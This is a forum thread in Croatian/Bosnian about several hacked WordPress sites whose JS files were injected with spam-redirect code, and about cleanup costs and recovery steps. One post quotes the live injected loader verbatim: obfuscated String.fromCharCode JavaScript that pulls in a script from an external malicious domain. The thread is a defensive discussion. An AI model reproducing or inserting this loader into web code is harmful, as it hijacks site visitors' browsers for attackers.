Gledam malo ove velike igrače poput Wordfence koji traži $490 za JEDAN sajt, a meni server cijeli hakiran. Isti je to hack, u sustini ako znas rijesiti jedan sajt znas i ostale i nije bas 5 puta veci posao za 5 sajtova. Imate li iskustva s ovim, znate li nekoga na Upworku od povjerenja? Platio bih ja velike pare ali za cijeli server. Hitno je, svi odgovori dobrodosli.
Šta znači očistiti? Koja nam je referentna točka? Kakvu garanciju tražiš ?
Ne zezam, nego ozbiljno pitam jer ti želim ukazati koliko je takav zadatak kompleksan. Ja čistim, ali se ne nudim jer trenutno nemam vremena. Kada i pronađeš nekoga , unaprijed definiraj što očekuješ i što u slučaju kasnijeg “napada” na site.
Pa vratiti sajt na funkcionalno stanje da ne redirecta sav traffic na spam i omogućiti wp-admin. Pričao sam ja sa Malcare supportom, nažalost 250 dolara je po jednom sajtu kad ne možeš ući u wp-admin. To je previše. Onda sam počeo sam čačkati i sad sam ih sve digao sa starijim backupima, krpio, spasio uploads folder pa umetao, ali čudno sad da ih 5 radi samo ako vratim na http, na https redirectaju, a ja bas nedavno, radi sigurnosti i SEO sve redirectao na https lol. Sad mi fali dosta stvari na sajtovima, related posts, sitnice, ali mislim da cu platiti 250 dolara za ovaj paket od 5 sajtova, pa bar biti siguran da se neće opet javiti, jer nije ovo čisto još, samo eto, radi.
Idealno bi bilo ovo inficirano što sam zipovao restaurirati da radi sajt kako je jučer radio, ali nemam ja očito para za to, evo neko mi u pm nudio za 700 eura 8 sajtova očistiti. Problem je što 3 sajta vrijede, a ovi drugi su onako, donose 5-10 eura mjesečno, a tretira se isto jbg.
Najgore sto ne mogu uci ni u wp-admin, a nemam backupe jer sam retardiran. Desi mi se to prije 3 dana, ali samo neki wp-zzz plugin zlocudni u plugin folderu, ja pobrisem na svakom sajtu i sve proradi. Napravim backup 2 sajta i kao hajde sutra ću. Desi se opet, ja kontam hajde obrisacu opet taj wp-zz sigurno je to, obrisem ih, ali ovaj put je mnogo gore sranje. Trazio sam preko AstroGrep taj neki appended kod uzeo string “104,101,97,100” i našao da je modificirano 500 fajlova, većinom js i jbg preko toga redirecta.
Replacam wp-admin i wp-includes folder komplet, ne pomaže. Znači nije tu. U suštini je u wp-content folderu u temi i pluginima, ali čak ni to nisam posve siguran jer sam ih pobrisao sve i novu temu stavio i opet se desava. Ali astrogrep zaista u wp-contentu pronalazi sve te modifikacije, nigdje drugo. Backup koji sam imao jednog sajta ga je ispravio skroz, dakle nije u bazi nego u fajlovima očito, sajt radi, samo mi nije jasno zašto drugi sajt ne radi kad mu sve zamijenim, ko da nešto propuštam
Ovo gofno bi trebalo biti odgovorno za sve i insertirano je na 500 mjesta
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var mj=String.fromCharCode(104,116,116,112,115,58,47,47,112,111,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,106,115,46,112,104,112,63,102,114,111,109,61,119,38,115,105,100,61,53,49,53); var t = document.createElement(String.fromCharCode(115,99,114,105,112,116)); t.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); t.src = mj;t.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);t.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(t);})();jQuery(document).on( ‘click’, ‘.visibility-notice’, function() {
Pa jel ima host backup?
Ma ima klinac. Davno sam bio hakiran i jedva nekako rekonstruisao sve i obeća mi lik sa KnownSrv evo dajemo ti backup besplatno svaki mjesec i ja se glupan oslonim na to. Neki dan pitam support kaže nemamo mi backup.
Joj ovo je grozno, sajt taman skočio na 16000 posjeta dnevno. Vratio sam neki stari backup, stara tema, fali postova, ovi drugi isto imaju 5000 posjete i učitavaju se nekako iz fastest-cache, ali do kad, ne znam. Čim kreneš ući u wp-admin krenu redirekcije. Evo gledam Malcare 1 site cleanup je affordable $249 ali opet to je jedan sajt i šta ako očiste jedan sajt, a on na serveru gdje sa drugih sajtova to može skočiti opet u njega. Nisu mi jasni sa ovom politikom 1 site.
Pa jesi pregledao druge fileove na serveru, ne samo do tog sajta, mozda uopce to niti nije tamo?
Sajt od kojeg sam imao backup, restoran i radi, bez diranja baze. Dakle sigurno je pretpostaviti da su baze čiste.
Jedan sam očistio tako što sam stari backup restorao sa starom temom, sačuvao uploads folder sa slikama, novu temu instalirao i vratio samo uploads folder sa slikama, baza ima postove čupa slike sve pet.
Mada buni me opet što kad obrišem na nekom sajtu sve plugin i teme, opet mi redirecta, a nema gdje drugo biti stvarno, jer i wp-admin i includes folder kompletno zamijenim, samo šibnem zipovane obrišem postojeće i unzip.
Mislim evo ja sam znači uspio jedan sajt vratiti komplet, a ovi bi mi uzeli 250 dolara za taj sajt. Ja to uradio za 10 minuta. Glupa im je politika, jer ovo je individualno uvijek. Taj sajt ne vrijedi 100 dolara da ga prodam lol
Da nije u header ili footer stavljen kod, pa da je zato na toliko mjesta?
Mah puno kompliciranije od toga, u wp-contentu je modificiralo stotine JS fajlova s tim kodom.
Onda ti samo preostaje, da uzmes backup databaze i onda instaliras wp ponovo sa temom tom sto imas (cistom) bez modifikacije js.
instaliraš svjež wordpress, instaliraj plugine i temu koju si koristio, export svega sa starog sajta i import na novi … pomoću wordpress export import tool … i pročačkaj bazu da preko baze ne pokreće neke queryje